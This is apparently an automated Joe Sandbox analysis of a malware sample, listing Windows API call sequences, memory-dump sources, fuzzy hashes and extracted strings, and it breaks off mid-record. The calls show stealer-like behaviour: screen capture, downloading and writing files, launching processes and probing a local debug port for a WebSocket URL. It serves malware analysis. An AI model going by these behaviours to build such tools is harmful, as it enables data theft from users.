                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                          • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                          • API String ID: 1530259920-2144369209
                          • Opcode ID: f4c9a80d58c42103bf9a51f231cbe5299afa4ce94384e31ae1d1f9604c740c64
                          • Instruction ID: 79e2496157be7a15d59bcd54498db789c6aee91c26c79045f2fb8330147c82c8
                          • Opcode Fuzzy Hash: f4c9a80d58c42103bf9a51f231cbe5299afa4ce94384e31ae1d1f9604c740c64
                          • Instruction Fuzzy Hash: 5351D471A10205ABD722DBA8DC45FEEF7B9DF54710F14006BF544E7280DBB4EA4887A1
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 003C16A1
                          • lstrcpy.KERNEL32(00000000,00F1A620), ref: 003C16CC
                          • lstrlen.KERNEL32(?), ref: 003C16D9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C16F6
                          • lstrcat.KERNEL32(00000000,?), ref: 003C1704
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C172A
                          • lstrlen.KERNEL32(00F2E1A8), ref: 003C173F
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C1762
                          • lstrcat.KERNEL32(00000000,00F2E1A8), ref: 003C176A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C1792
                          • ShellExecuteEx.SHELL32(?), ref: 003C17CD
                          • ExitProcess.KERNEL32 ref: 003C1803
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                          • String ID: <
                          • API String ID: 3579039295-4251816714
                          • Opcode ID: 95b1ff5b8709dc9e2ffee27eb168771b0cf89f70da74872e7c428e40025af94b
                          • Instruction ID: e0a8acf15762c53a583aec0f355c95c46bbe2f8b51cb81b89163cf3d2198a7f9
                          • Opcode Fuzzy Hash: 95b1ff5b8709dc9e2ffee27eb168771b0cf89f70da74872e7c428e40025af94b
                          • Instruction Fuzzy Hash: 4F518571E0221AABDB22DFA4DC84A9FB7F9EF55300F15412AE505E7251EF30AE05DB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BEFE4
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BF012
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003BF026
                          • lstrlen.KERNEL32(00000000), ref: 003BF035
                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 003BF053
                          • StrStrA.SHLWAPI(00000000,?), ref: 003BF081
                          • lstrlen.KERNEL32(?), ref: 003BF094
                          • lstrlen.KERNEL32(00000000), ref: 003BF0B2
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 003BF0FF
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 003BF13F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$AllocLocal
                          • String ID: ERROR
                          • API String ID: 1803462166-2861137601
                          • Opcode ID: 97761c748e045e8ac17f55fa45dfe0a1770ea3282ff7e9ad3ca8a522ea372364
                          • Instruction ID: 8fbb19ebc81004b31fdd39d6acc128869808dfe3941c98f9cbc1367a9e8ec73f
                          • Opcode Fuzzy Hash: 97761c748e045e8ac17f55fa45dfe0a1770ea3282ff7e9ad3ca8a522ea372364
                          • Instruction Fuzzy Hash: AF518B31A112059FCB33AB7CDC49AAF77A5EF51704F06546AF9469BA22EB30DC01CB90
                          APIs
                          • GetEnvironmentVariableA.KERNEL32(00F29328,005D9BD8,0000FFFF), ref: 003AA026
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003AA053
                          • lstrlen.KERNEL32(005D9BD8), ref: 003AA060
                          • lstrcpy.KERNEL32(00000000,005D9BD8), ref: 003AA08A
                          • lstrlen.KERNEL32(003D4C4C), ref: 003AA095
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AA0B2
                          • lstrcat.KERNEL32(00000000,003D4C4C), ref: 003AA0BE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AA0E4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003AA0EF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AA114
                          • SetEnvironmentVariableA.KERNEL32(00F29328,00000000), ref: 003AA12F
                          • LoadLibraryA.KERNEL32(00F16178), ref: 003AA143
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                          • String ID:
                          • API String ID: 2929475105-0
                          • Opcode ID: 5f540f1c2c3cdac616e91e3199d32d074947d99acf17df086219063482d74db4
                          • Instruction ID: c077b18936a3e3cc6de3eb30819eb2fecf96307a606dd003525d12c51b256c6c
                          • Opcode Fuzzy Hash: 5f540f1c2c3cdac616e91e3199d32d074947d99acf17df086219063482d74db4
                          • Instruction Fuzzy Hash: 3291D132A01E009FD7329FA8DC84A7637A5EB66704F42051FE4058B6A2EFB5DC44DB82
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BC8A2
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003BC8D1
                          • lstrlen.KERNEL32(00000000), ref: 003BC8FC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003BC932
                          • StrCmpCA.SHLWAPI(00000000,003D4C3C), ref: 003BC943
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: 82bf8302199252945979082b832f52c326afda4c6d633774eac7c1e68c0e98af
                          • Instruction ID: 66a71b08c753120e291948859e95aba7a49507b417dbfd333e30e4a504aa9f3c
                          • Opcode Fuzzy Hash: 82bf8302199252945979082b832f52c326afda4c6d633774eac7c1e68c0e98af
                          • Instruction Fuzzy Hash: 2761C371E212199BDB32EFB8DC48AEF7BB8EF15744F05106AE942EB601D7349D058B90
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,003C0CF0), ref: 003C4276
                          • GetDesktopWindow.USER32 ref: 003C4280
                          • GetWindowRect.USER32(00000000,?), ref: 003C428D
                          • SelectObject.GDI32(00000000,00000000), ref: 003C42BF
                          • GetHGlobalFromStream.COMBASE(003C0CF0,?), ref: 003C4336
                          • GlobalLock.KERNEL32(?), ref: 003C4340
                          • GlobalSize.KERNEL32(?), ref: 003C434D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                          • String ID:
                          • API String ID: 1264946473-0
                          • Opcode ID: 4c89c49a7ed5bcb7ee6a1e12594ebeb3d1949f25076fddee011d7400f1e7a27a
                          • Instruction ID: a167fcfa3cc7d70d54f47bc37425d8837d274578b1eb72fc1567c5ca731b7f67
                          • Opcode Fuzzy Hash: 4c89c49a7ed5bcb7ee6a1e12594ebeb3d1949f25076fddee011d7400f1e7a27a
                          • Instruction Fuzzy Hash: A6514075A11209AFDB21DFA4EC89EEEB7B9EF58300F10441AF905E7250DB34AD05DBA0
                          APIs
                          • lstrcat.KERNEL32(?,00F2EBF0), ref: 003BE00D
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003BE037
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BE06F
                          • lstrcat.KERNEL32(?,00000000), ref: 003BE07D
                          • lstrcat.KERNEL32(?,?), ref: 003BE098
                          • lstrcat.KERNEL32(?,?), ref: 003BE0AC
                          • lstrcat.KERNEL32(?,00F1A5F8), ref: 003BE0C0
                          • lstrcat.KERNEL32(?,?), ref: 003BE0D4
                          • lstrcat.KERNEL32(?,00F2DB20), ref: 003BE0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BE11F
                          • GetFileAttributesA.KERNEL32(00000000), ref: 003BE126
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 4230089145-0
                          • Opcode ID: 9732761ecf1f2f6f670101db03317e884c4558448978507cd9f3f311d2d30e0e
                          • Instruction ID: f7649c830ba416c1255b27628034e0da12fd6c7e7d569217a76f640336ceab92
                          • Opcode Fuzzy Hash: 9732761ecf1f2f6f670101db03317e884c4558448978507cd9f3f311d2d30e0e
                          • Instruction Fuzzy Hash: 6C61937191111CEBCB26EB68DC48ADE77B8FF58300F1449A6E60997250EF709F859F90
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A6AFF
                          • InternetOpenA.WININET(003CCFEC,00000001,00000000,00000000,00000000), ref: 003A6B2C
                          • StrCmpCA.SHLWAPI(?,00F2F170), ref: 003A6B4A
                          • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 003A6B6A
                          • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003A6B88
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 003A6BA1
                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 003A6BC6
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 003A6BF0
                          • CloseHandle.KERNEL32(00000000), ref: 003A6C10
                          • InternetCloseHandle.WININET(00000000), ref: 003A6C17
                          • InternetCloseHandle.WININET(?), ref: 003A6C21
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                          • String ID:
                          • API String ID: 2500263513-0
                          • Opcode ID: eb6b30dd5835c0c65c0624340289973ec9a2e72fbc49d6c0f9e8b04e6f9a2857
                          • Instruction ID: 160989a70185b889ef1a4e8b1f58ee21749c23877ee4fa4d9dbe9bcca36d4875
                          • Opcode Fuzzy Hash: eb6b30dd5835c0c65c0624340289973ec9a2e72fbc49d6c0f9e8b04e6f9a2857
                          • Instruction Fuzzy Hash: 7541C371A01205ABDB21DFA4DC4AFAE77BCEF14700F04445AFA05EB290EF70AD049BA4
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,003B4F39), ref: 003C4545
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003C454C
                          • wsprintfW.USER32 ref: 003C455B
                          • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 003C45CA
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 003C45D9
                          • CloseHandle.KERNEL32(00000000,?,?), ref: 003C45E0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                          • String ID: 9O;$%hs$9O;
                          • API String ID: 885711575-2038196370
                          • Opcode ID: 8f36e1bbd942422165aacfbb20132293af2d822a1fd32ae410b21fef409f75b9
                          • Instruction ID: 72ccf6c815a73f4a0c2c62c63c907acfde36b1889fe84cd260c23386c60326c3
                          • Opcode Fuzzy Hash: 8f36e1bbd942422165aacfbb20132293af2d822a1fd32ae410b21fef409f75b9
                          • Instruction Fuzzy Hash: B0314372A01205BBEB21DBE4DC49FEE7779FF55700F10405AFA05E7180DB706A458BA5
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003ABC1F
                          • lstrlen.KERNEL32(00000000), ref: 003ABC52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ABC7C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003ABC84
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ABCAC
                          • lstrlen.KERNEL32(003D4AD4), ref: 003ABD23
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: a0fe4fbf6eee39b81665996e38380d79f3433ea0ea46233e0c454f49d7e35346
                          • Instruction ID: d95b27a8db031a5d9266866de380ed0fc84ceb277bbaeb6d522d375a9bbe6214
                          • Opcode Fuzzy Hash: a0fe4fbf6eee39b81665996e38380d79f3433ea0ea46233e0c454f49d7e35346
                          • Instruction Fuzzy Hash: 80A16030A11205CFCB26EF68D949AAEF7B5EF56304F19806EE406DB262DB31DC45CB90
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 003C5F2A
                          • std::_Xinvalid_argument.LIBCPMT ref: 003C5F49
                          • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 003C6014
                          • memmove.MSVCRT(00000000,00000000,?), ref: 003C609F
                          • std::_Xinvalid_argument.LIBCPMT ref: 003C60D0
                          Strings
                          Memory Dump Source
